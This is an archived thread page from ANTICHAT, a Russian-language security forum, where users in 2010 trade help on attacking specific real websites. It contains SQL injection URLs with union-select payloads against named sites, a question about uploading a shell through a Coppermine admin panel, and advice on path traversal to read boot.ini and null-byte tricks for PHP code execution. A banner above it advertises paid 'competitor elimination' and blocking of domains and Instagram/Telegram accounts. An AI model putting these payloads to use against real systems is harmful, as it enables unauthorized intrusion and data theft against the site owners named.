УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1543 из 2438

1543

Опции темы

Поиск в этой теме

Опции просмотра

#15421

23.10.2010, 19:16

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

Провел на форуме:
792994

Репутация: 104

Цитата:

Сообщение от Generalisimu

Generalisimu said:
нашел уязвимость!но не могу правельно составить запрос!
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'NEWS_ID=345';'.
/ru/_news.asp, line 260
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3 ,4,5,6,7,8+from+news
http://www.activ.kz/ru/?l=news&o=display&page=&idx=-345+union+select+*+from+msysobjects+in+'.'
Microsoft JET Database Engine error '80004005'
The Microsoft Jet database engine cannot open the file 'c:\windows\system32\inetsrv'. It is already opened exclusively by another user, or you need permission to view its data.
/ru/_news.asp, line
Но вывести нечего не удаеться.
Поскажите, как правилбно составить запрос.

Запрос правильный.

Вот например выводится id новости.

Код:

Code:
http://www.activ.kz/ru/?l=news&o=display&page=&idx=345+union+select+1,2,3,4,NEWS_ID,6,7,8+from+news

Так как доступа нет к системным таблицам MS Access, подбирать таблицу и колонки придется в ручную.

Советую почитать Проведение SQL инъекций в Microsoft Access

#15422

24.10.2010, 12:00

.:[melkiy]:.

Постоянный

Регистрация: 25.01.2009

Сообщений: 368

Провел на форуме:
5290740

Репутация: 912

как залить шелл через админку Coppermine Photo Gallery 1.4.12?

#15423

24.10.2010, 12:05

-PRIVAT-

Участник форума

Регистрация: 17.04.2010

Сообщений: 221

Провел на форуме:
344917

Репутация: 17

.:[melkiy]:., линк в ПМ.

#15424

24.10.2010, 15:14

JohnnyBGoode

Guest

Сообщений: n/a

Провел на форуме:
8669

Репутация: 5

http://www.7not.net/?m=news&n='

http://www.7not.net/?n=-1'

Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит

#15425

25.10.2010, 21:13

Gedj

Познающий

Регистрация: 15.09.2008

Сообщений: 54

Провел на форуме:
612815

Репутация: 46

Цитата:

Сообщение от JohnnyBGoode

JohnnyBGoode said:
http://www.7not.net/?m=news&n='
http://www.7not.net/?n=-1'
Как здесь запрос составить подскажите.Пробовал и union+select и order+by и что-то ничего не выходит

Нет тут скули

#15426

26.10.2010, 00:32

povar

Guest

Сообщений: n/a

Провел на форуме:
956

Репутация: 0

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]

подскажите, тут можно как-нибудь выполнить произвольный код?

#15427

26.10.2010, 01:35

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от povar

povar said:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]

подскажите, тут можно как-нибудь выполнить произвольный код?

Это равносильно тому, что написать:

$a = $_GET['a'];

тут есть выполнение произвольного кода?

Может переменная попадает в SQL запрос, или eval, или include, или просто выводится на страницу. Исходя из этого уже можно делать какие то выводы. А пока что, экстрасенсов тут нет.

Все, что можно сказать по этой строке, это то, что переменная 'a' равна переменной 'b', переданной методом GET с отфильтрованными слешами.

Либо выкладывай больше кода, либо выполнения произвольного кода здесь нет.

#15428

26.10.2010, 01:35

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от povar

povar said:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/\//'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"b"[/COLOR][COLOR="#007700"]]);[/COLOR][/COLOR]

подскажите, тут можно как-нибудь выполнить произвольный код?

А при чем тут выполнение кода? Тут, я так понимаю, режуться символы от LFI\RFI. Есть способы обхода данного фильтра, фильтр слишком глупый =\

UPD:Я что-то не понял фильтра, там вроде массив должен быть, но не как все сразу перечислены, такой фильтр не от чего не защищает

#15429

26.10.2010, 01:47

povar

Guest

Сообщений: n/a

Провел на форуме:
956

Репутация: 0

Выдержка из этой статьи:

/thread56756.html

Цитата:

Сообщение от None

Достаточно известный способ выполнить команды там, где нельзя, но очень хочется =)
При использовании /e(~e) модификатора в регулярке - пхп код, содержащийся во втором аргументе, выполнится...
....
Однако, даже если модификатор /e отсутствует - мы при возможности можем внедрить его, обрубив регулярку NULL-байтом.

В моем случае так нельзя проделать?

#15430

26.10.2010, 01:57

povar

Guest

Сообщений: n/a

Провел на форуме:
956

Репутация: 0

дальше идет:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"./[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);     

while([/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fread[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1024[/COLOR][COLOR="#007700"])) print[/COLOR][COLOR="#0000BB"]$r[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

все это крутится на винде, скорее всего хр.

т.к. / фильтруются, пробовал ..\..\..\..\..\..\..\boot.ini

но не выводит ничего. ошибки не выводятся, путей нет.

какие варианты дальнейших действий?

Страница 1543 из 2438

1543

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход